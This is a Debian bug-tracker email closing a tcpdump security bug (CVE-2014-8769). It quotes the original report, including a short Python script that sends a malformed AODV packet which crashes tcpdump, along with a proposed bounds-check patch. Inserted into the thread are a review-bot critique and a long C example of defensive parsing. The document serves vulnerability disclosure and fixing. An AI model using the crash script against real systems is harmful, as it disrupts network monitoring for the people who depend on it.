Your message dated Sat, 22 Nov 2014 11:04:13 +0000
with message-id <e1xs8u9-0004fc...@franck.debian.org>
and subject line Bug#770424: fixed in tcpdump 4.6.2-2
has caused the Debian Bug report #770424,
regarding tcpdump: CVE-2014-8769: unreliable output using malformed AOVD payload
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
770424: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=770424
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---

Package: tcpdump
Version: 4.6.2
tags: Security

Using the following script to generate a packet:

#!/usr/bin/env python
from socket import socket, AF_PACKET, SOCK_RAW
s = socket(AF_PACKET, SOCK_RAW)   # raw link-layer socket on the loopback interface
s.bind(("lo", 0))

# Ethernet + IPv4 + UDP frame carrying the malformed AODV payload
# (bytes literal so the same script runs under Python 2 and Python 3)
aovd_frame = b"\x00\x00\x00\x00\x00\x00\x00\x00\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\x8e\x0d\x00\x4b\x00\x00\xe8\x12\x00\x00\x00\x00\x1f\xc6\x51\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01"

s.send(aovd_frame)



#sudo tcpdump -i lo -s 0 -n -v
This causes a segfault in tcpdump. This bug is reported as CVE-2014-8769.
The proposed patch is in the attached file. The main idea is to check the
length of the available data before printing it on screen.

The credit belongs to
Steffen Bauch
Twitter: @steffenbauch
http://steffenbauch.de

Original report in bugtraq:
http://seclists.org/bugtraq/2014/Nov/88

CongNT


--- tcpdump-tcpdump-4.6/print-udp.c	2014-11-21 13:53:05.757690197 +0700
+++ tcpdump-4.6.2/print-udp.c	2014-11-21 13:50:58.077695164 +0700
@@ -357,6 +357,12 @@
 #ifdef INET6
 	register const struct ip6_hdr *ip6;
 #endif
+	u_int caplength;
+
+	/* Checking length of available data before print */
+	caplength = (ndo->ndo_snapend >= bp) ? ndo->ndo_snapend - bp : 0;
+	if (length > caplength)
+		length = caplength;
 
 	if (ep > ndo->ndo_snapend)
 		ep = ndo->ndo_snapend;
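Review bot: clamping `length` at the top of this function changes the meaning of `length` for everything that follows in it: code further down that uses `length` as the length the packet headers claim (to print a size or to decide how much payload follows) now silently sees the captured length instead, which alters output for every truncated capture (for example a small `-s` snaplen), not only for the malformed AODV packet. The trailing context already bounds `ep` to `ndo->ndo_snapend` independently, so after this hunk there are two separate truncation limits that can disagree. The narrower fix is per-field checks against `ndo->ndo_snapend` in the AODV printer before each read, which is also how the fixing upload's changelog describes the adopted change ("missing bounds checks in AOVD dissector"). Minor: the comment `/* Checking length of available data before print */` would read better as `/* Limit length to the bytes actually captured */`.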

--- End Message ---
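The defence the report describes (checking the length of the available data before printing it) in a self-contained form, as an added example that is neither tcpdump's code nor the reporter's patch: a toy dissector for a constructed record layout (not the real AODV format) that first clamps the claimed length to the captured bytes, as the proposed patch does at the UDP layer, and then checks each variable-length field against the end of the capture before reading it, emitting a truncation marker instead of reading past the buffer. The record layout, the function names and the sample bytes are all assumptions made for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Added example, not tcpdump code. The record layout is constructed for this
 * example and is NOT the real AODV format:
 *   byte 0      type
 *   byte 1      flags
 *   bytes 2-3   hop_count, big-endian: number of 4-byte addresses that follow
 *   bytes 4-7   destination address, big-endian
 *   bytes 8..   hop_count * 4 bytes of hop addresses
 */

/* Constructed sample record: 2 hops, 16 bytes on the wire. */
static const uint8_t sample_record[16] = {
    0x01, 0x00,             /* type 1, flags 0 */
    0x00, 0x02,             /* hop_count = 2 */
    0x0a, 0x00, 0x00, 0x01, /* dst 10.0.0.1 */
    0x0a, 0x00, 0x00, 0x02, /* hop 10.0.0.2 */
    0x0a, 0x00, 0x00, 0x03  /* hop 10.0.0.3 */
};

/* The clamp from the proposed patch: `length` comes from the packet's own
 * headers and is attacker controlled, so never trust it beyond the number
 * of bytes that are actually in the capture buffer. */
static unsigned int clamp_to_capture(const uint8_t *bp, unsigned int length,
                                     const uint8_t *snapend)
{
    unsigned int caplength = (snapend >= bp) ? (unsigned int)(snapend - bp) : 0;
    return length > caplength ? caplength : length;
}

/* True when n bytes starting at p lie entirely within the captured data
 * (the equivalent of a per-field check against ndo_snapend before reading). */
static int captured(const uint8_t *p, size_t n, const uint8_t *snapend)
{
    return p <= snapend && (size_t)(snapend - p) >= n;
}

static unsigned int get_be16(const uint8_t *p)
{
    return ((unsigned int)p[0] << 8) | p[1];
}

static unsigned int get_be32(const uint8_t *p)
{
    return ((unsigned int)p[0] << 24) | ((unsigned int)p[1] << 16) |
           ((unsigned int)p[2] << 8) | p[3];
}

/*
 * Dissect one record into `out`. `length` is what the enclosing header
 * claims, `snapend` points one past the last captured byte. Returns the
 * number of hop addresses printed, or -1 when the capture ended before the
 * record could be read in full (the output then ends in "[|rec]", the way
 * tcpdump prints "[|proto]" instead of reading past its buffer) or when
 * `out` is too small.
 */
static int dissect_record(const uint8_t *bp, unsigned int length,
                          const uint8_t *snapend, char *out, size_t outsz)
{
    size_t used = 0;
    unsigned int i, hop_count;
    int n;

    length = clamp_to_capture(bp, length, snapend);
    if (length < 8)              /* fixed header not fully captured */
        goto trunc;

    hop_count = get_be16(bp + 2);
    n = snprintf(out, outsz, "type %u flags 0x%02x hops %u dst 0x%08x",
                 (unsigned int)bp[0], (unsigned int)bp[1], hop_count,
                 get_be32(bp + 4));
    if (n < 0 || (size_t)n >= outsz)
        return -1;
    used = (size_t)n;

    /* hop_count is attacker controlled: bounds-check every address. */
    for (i = 0; i < hop_count; i++) {
        const uint8_t *addr = bp + 8 + (size_t)i * 4;
        if (!captured(addr, 4, snapend))
            goto trunc;
        n = snprintf(out + used, outsz - used, " hop 0x%08x", get_be32(addr));
        if (n < 0 || (size_t)n >= outsz - used)
            return -1;
        used += (size_t)n;
    }
    return (int)hop_count;

trunc:
    snprintf(out + used, outsz - used, "%s[|rec]", used ? " " : "");
    return -1;
}

int main(void)
{
    char out[256];
    int rc;

    /* Full capture: every byte the header claims is present. */
    rc = dissect_record(sample_record, sizeof sample_record,
                        sample_record + sizeof sample_record, out, sizeof out);
    printf("full capture : %d -> %s\n", rc, out);

    /* Short capture (small -s snaplen, or a forged length): the header
     * still claims 16 bytes and 2 hops, but only 12 bytes were captured. */
    rc = dissect_record(sample_record, sizeof sample_record,
                        sample_record + 12, out, sizeof out);
    printf("short capture: %d -> %s\n", rc, out);
    return 0;
}
```

The two checks are deliberately separate: the clamp protects the fixed header in one step, while the per-address check is what actually stops a forged `hop_count` from driving reads past the capture, since clamping alone says nothing about how many addresses the packet really carries.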
--- Begin Message ---
Source: tcpdump
Source-Version: 4.6.2-2

We believe that the bug you reported is fixed in the latest version of
tcpdump, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 770...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Romain Francoise <rfranco...@debian.org> (supplier of updated tcpdump package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Sat, 22 Nov 2014 11:48:08 +0100
Source: tcpdump
Binary: tcpdump
Architecture: amd64 source
Version: 4.6.2-2
Distribution: unstable
Urgency: high
Maintainer: Romain Francoise <rfranco...@debian.org>
Changed-By: Romain Francoise <rfranco...@debian.org>
Closes: 770415 770424 770434
Description: 
 tcpdump    - command-line network traffic analyzer
Changes:
 tcpdump (4.6.2-2) unstable; urgency=high
 .
   * Urgency high due to security fixes.
   * Add three patches extracted from various upstream commits fixing
     vulnerabilities in three dissectors:
     + CVE-2014-8767: missing bounds checks in OLSR dissector (closes: #770434).
     + CVE-2014-8768: missing bounds checks in Geonet dissector
       (closes: #770415).
     + CVE-2014-8769: missing bounds checks in AOVD dissector (closes: #770424).
Checksums-Sha1: 
 57c8f0416165d208c8ae198dc98356d91afd09a9 1915 tcpdump_4.6.2-2.dsc
 7eaa17f35087f264ae326d76b31755f9742cb2b1 16688 tcpdump_4.6.2-2.debian.tar.xz
 7a1d0ae5a24ac88460613be7eacfd09780c8a9c4 376982 tcpdump_4.6.2-2_amd64.deb
Checksums-Sha256: 
 8487b9f862d770d803dcd0c6822c2202312f943492755b4841135a26256f4fc4 1915 tcpdump_4.6.2-2.dsc
 0ae5ff1b8513b9218a01d38de2d4009f0f25c1437ba2d94eb4a6c8314466d6d2 16688 tcpdump_4.6.2-2.debian.tar.xz
 ce138f564b1d427cdbec57ab626f967da7ba92e9d9411911fdfce0c311aa1c23 376982 tcpdump_4.6.2-2_amd64.deb
Files: 
 b71ede0c26d7fa4bf8feca523e51efba 1915 net optional tcpdump_4.6.2-2.dsc
 4a0c1dd046d8e6d930c4407b6440bcac 16688 net optional tcpdump_4.6.2-2.debian.tar.xz
 3d9c3b86c1f252c7fa0c1de43f221077 376982 net optional tcpdump_4.6.2-2_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
-----END PGP SIGNATURE-----

--- End Message ---
